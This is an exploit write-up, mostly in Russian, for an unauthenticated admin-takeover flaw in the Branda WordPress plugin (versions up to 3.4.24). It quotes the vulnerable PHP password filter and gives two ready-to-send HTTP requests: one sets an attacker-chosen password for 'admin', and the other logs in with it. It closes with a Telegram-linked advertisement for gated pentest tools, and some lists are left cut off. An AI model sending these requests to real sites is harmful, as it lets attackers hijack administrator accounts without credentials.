
CVE-2025-14998 WordPress 插件 - Branda – White Label & Branding, Free Login Page Customizer <= 3.4.24 - 通过帐户接管实现未认证权限提升
CVE-2025-14998 Плагин Branda для WordPress уязвим к повышению привилегий через захват аккаунта во всех версиях до 3.4.24 включительно. Это связано с тем, что плагин не проверяет должным образом личность пользователя перед обновлением его пароля. Это позволяет неаутентифицированным злоумышленникам изменять пароли произвольных пользователей, включая администраторов, и использовать это для получения доступа к их аккаунту.
За дополнительными уязвимостями WordPress и эксклюзивными инструментами для пентеста свяжитесь со мной в Telegram @KtN1990.
Плагин переопределяет логику генерации паролей WordPress, подключаясь к фильтру random_password. Вместо того чтобы позволить WordPress сгенерировать безопасный случайный пароль, плагин заменяет его на вводимые пользователем данные.
public function password_random_password_filter( $password ) {
global $wpdb, $signup_password_use_encryption;
if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
$key = $_GET['key'];
} elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
$key = $_POST['key'];
}
if ( ! empty( $_POST['password_1'] ) ) {
$password = $_POST['password_1'];
} elseif ( ! empty( $key ) ) {
$signup = $wpdb->get_row(
$wpdb->prepare(
"SELECT * FROM $wpdb->signups WHERE activation_key = '%s'",
$key
)
);
if ( ! ( empty( $signup ) || $signup->active ) ) {
$meta = maybe_unserialize( $signup->meta );
if ( ! empty( $meta['password'] ) ) {
if ( 'yes' === $signup_password_use_encryption ) {
$password = $this->password_decrypt( $meta['password'] );
} else {
$password = $meta['password'];
}
}
}
}
return $password;
}
POST /wp/wp-login.php?action=lostpassword HTTP/1.1
Host: example.local
Content-Type: application/x-www-form-urlencoded
user_login=admin&
redirect_to=&
password_1=EfUSmvnTun5XbvE6RvIB&
wp-submit=Get+New+Password
Значение password_1 может быть любой строкой, контролируемой злоумышленником.
GET /wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp HTTP/1.1
Host: example.local
Не требуется доступ к электронной почте или действительный токен сброса пароля.
Неаутентифицированный злоумышленник может:

-🛡️ Идеально подходит для: – Исследователей безопасности – Тестировщиков на проникновение – Этичных хакеров
📦 Поддерживаемая линейка с ~230 устаревшими модулями исследований; недавние улучшения ядра сканера для стабильности и обнаружения.
🎯 Назначение: Предоставляется строго для авторизованного тестирования безопасности, образования, оборонительных исследований и тренировок красных команд. Этот релиз не предназначен для незаконного использования. Распространение ограничено — доступ только после проверки и подписания Соглашения об ответственном использовании / NDA.
-🛡 Политика ответственного доступа (кратко):